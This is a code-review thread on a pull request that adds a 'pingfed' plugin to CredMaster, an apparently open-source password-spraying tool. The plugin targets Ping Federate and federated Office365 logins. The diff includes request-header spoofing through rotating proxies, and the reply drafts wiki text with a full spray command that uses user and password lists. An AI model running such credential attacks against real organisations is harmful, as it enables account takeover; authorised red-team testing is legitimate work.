plugins/pingfed/__init__.py

```diff
@@ -0,0 +1,39 @@
+import requests
+import utils.utils as utils
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+def validate(pluginargs, args):
+    #
+    # Plugin Args
+    #
+    # --url https://ping.domain.com   ->  Ping target
+    #
+    if "url" in pluginargs.keys():
+        return True, None, pluginargs
+    else:
+        error = "Missing url, specify as --url https://ping.domain.com"
+        return False, error, None
+
+
+def testconnect(pluginargs, args, api_dict, useragent):
+
+    success = True
+    headers = {
+        "User-Agent" : useragent,
+        "X-My-X-Forwarded-For" : utils.generate_ip(),
+        "x-amzn-apigateway-api-id" : utils.generate_id(),
+        "X-My-X-Amzn-Trace-Id" : utils.generate_trace_id(),
+    }
+
+    headers = utils.add_custom_headers(pluginargs, headers)
+
+    resp = requests.get(api_dict["proxy_url"], headers=headers)
+
+    if resp.status_code == 504:
+        output = "Testconnect: Connection failed, endpoint timed out, exiting"
+        success = False
+    else:
+        output = "Testconnect: Connection success, continuing"
```

Comment:
I'm comfortable merging this without a ton of testing if you add a warning on this line that says this plugin is in beta mode and has not been rigorously tested, I know it's hard to test these things and I don't want to just keep your PR dangling

Reply:
Yeah it's been tough to fully validate, I appreciate that! Hopefully getting it out there means we could get some additional testing on it and confirm one way or another.

I added that warning and reference links to the README but I don't believe I can submit a PR for the Wiki. Here is what I would add, mostly copied from existing pages:

### Plugin Overview

The PingFed module is for brute-forcing authentication against Ping Federated Authentication using the PingOneHTMLFormAdapter method. This can be used against a Federated Office365 setup where Ping is the identity provider.

Code and technique compliments of [missing0x00](https://twitter.com/missing0x00)

WARNING - This plugin is in beta and has not been rigorously tested! Please report issues or confirmed successes using this plugin.

### Unique Command Line Options

This plugin requires the `--url` argument targeting the Ping server.

### Throttle Notes

TBD, more research required (feel free to PR with notes).

### Example Command

```
python3 credmaster.py --access_key <key> --secret_access_key <key> \
    --plugin pingfed --url https://ping.domain.com \
    -u userfile.txt -p passfile.txt -a useragents.txt -o outputfile \
    -t 5 -j 20 -m 10 -d 360 --passwordsperdelay 3
```